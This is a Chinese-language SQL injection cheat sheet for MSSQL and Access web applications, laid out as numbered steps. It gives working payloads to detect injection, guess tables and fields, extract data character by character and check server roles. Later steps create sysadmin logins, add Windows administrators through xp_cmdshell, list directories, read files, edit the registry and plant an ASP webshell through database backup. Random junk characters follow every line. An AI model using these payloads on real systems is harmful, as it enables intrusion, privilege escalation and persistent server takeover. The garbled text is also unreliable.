1.判断是否有注入;and 1=1 ;and 1=2 z<u*I@;
2.初步判断是否是mssql ;and user>0 O.Xhi+
rctGa ,l
3.注入参数是字符'and [查询条件] and ''=' :.bBV]6q
tR`^c8gD
4.搜索时没过滤参数的'and [查询条件] and '%25'=' +Cg[!6[#
= Y`e?\#`
5.判断数据库系统 0wnC"2GUX
7Z[6_WD3
;and (select count(*) from sysobjects)>0 mssql h51)kN:
9T;DFUM
;and (select count(*) from msysobjects)>0 access d;FOmo4
*mtS\J
eRm 9LOp
]r.95|V*
6.猜数据库 ;and (select Count(*) from [数据库名])>0 wMvAm%}+
fuao*L]
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ~lH_d[
G'IRqO*]
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 wx[Y2lUh6
uP NZ^lM
9.(1)猜字段的ascii值(access) # ;3v4P
%&}gt+L(M
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 fZka$
4
h=
Mmd
(2)猜字段的ascii值(mssql)
'LW~_\
oj%(@6L
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 (F=q/lK$
*pj^d><
10.测试权限结构(mssql) (JdZl2A.
w gU2q|
XkRPD
YE;Tpji
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- h6~H5X
EaN1xb(DYa
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- B6J<
9AP." RV
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- S\<nCkE^
_Y _v&
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fb|%)A=
M T]2n{e
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V_"UiN"o
!Y^3% B%
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &MJcLM]
nXM[#~
;and 1=(select IS_MEMBER('db_owner'));-- Q|7l!YTzVu
< VrHWJo
J>N^ FR9
Gc*p%2c
11.添加mssql和系统的帐户 |{V@t1`
7&w$@zs87
;exec master.dbo.sp_addlogin username;-- K.r
"KxCm|
;exec master.dbo.sp_password null,username,password;-- BRTCo,i
=QS%D*.|D
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ocPM zq-
\#7@"~<
;exec master.dbo.xp_cmdshell 'net user username password S pIdw0
iTcq=
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 05s{Z.aK
OKV/=]GS
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Y>J u$i
~sMEfY,p
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ')zf8>,
S'}pUGDO
vR*p1Kq:
y#v<V1b]
12.(1)遍历目录 t~_bquGk
^E]y >Y
;create table dirs(paths varchar(100), id int) ;/ASl<t,
OOZxs?pR
;insert dirs exec master.dbo.xp_dirtree 'c:\' )SzgMbF6
,~*pPhQ8m
;and (select top 1 paths from dirs)>0 0dCg/wJx
"Ta"5XW
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) *o6hDhg
Ye]-RN/W
]US
pE381Cw
(2)遍历目录 [Z2mH
GZzBATx
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- sh)[|?7z
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 7p_B?r
^,{ r[}
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 3A!Qu$r9
)MeeF-Ad6
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 O#n=mJ
`h='FJ/!
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 pSdtAv
H: ]'r5sw
fb?YDM
'cPE7uNT
13.mssql中的存储过程 !EOYqD
@&f~#Xe
xp_regenumvalues 注册表根键, 子键 E-v^eMWX
IN?6~O
p
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 |Ng}ZLBM
RC~ C}
xp_regread 根键,子键,键值名 E~
+g6YlT
,b9!\OWDF
;exec xp_regread EI8KK o *
:=?od
0]W
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 h@jk3J9^
j^m x ,
xp_regwrite 根键,子键, 值名, 值类型, 值 l?O%yf`s
)7 M
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 tQ,3nI!|xF
;(
[^+_/
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a[ yyEgm2
/|p6NK;8L
xp_regdeletevalue 根键,子键,值名 -Ra-Ux
/3j3'~0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 v~:'t\n
*]*0uo
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 GQ6~Si2
O"9Or3w
Bmv5yc+;
|h-e+Wh1
14.mssql的backup创建webshell 6kHuKxY,
hxkwT
use model ( 9(NP_s
IVso/!
create table cmd(str image); $fAZ^
?X@uR5?{
insert into cmd(str) values (''); k-I U}|Xz
\[<8AV"E-'
backup database model to disk='c:\l.asp'; n'83P%x
`{H!V~42
GP0}I@>?
$_O;yz
15.mssql内置函数 0?*":o30
C&f{LpB`
;and (select @@version)>0 获得Windows的版本号 OZ4% 6/
51 "v`O+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa o[aIQ|G
;N^4R$Q.
;and (select user_name())>0 爆当前系统的连接用户 .#LvvAeh
JZ)w
;and (select db_name())>0 得到当前连接的数据库 B4{F)Zb
&
Tkl-{I
C:p`
6ag0c&k
16.简洁的webshell wRu\9H}
rO]2we/B,4
use model " nLWvV1
SI/3Dz[
create table cmd(str image); AA5UOg\jI
[<.dOe7|
insert into cmd(str) values (''); 7T?T0x3>
>:|jds#
backup database model to disk='g:\wwwtest\l.asp';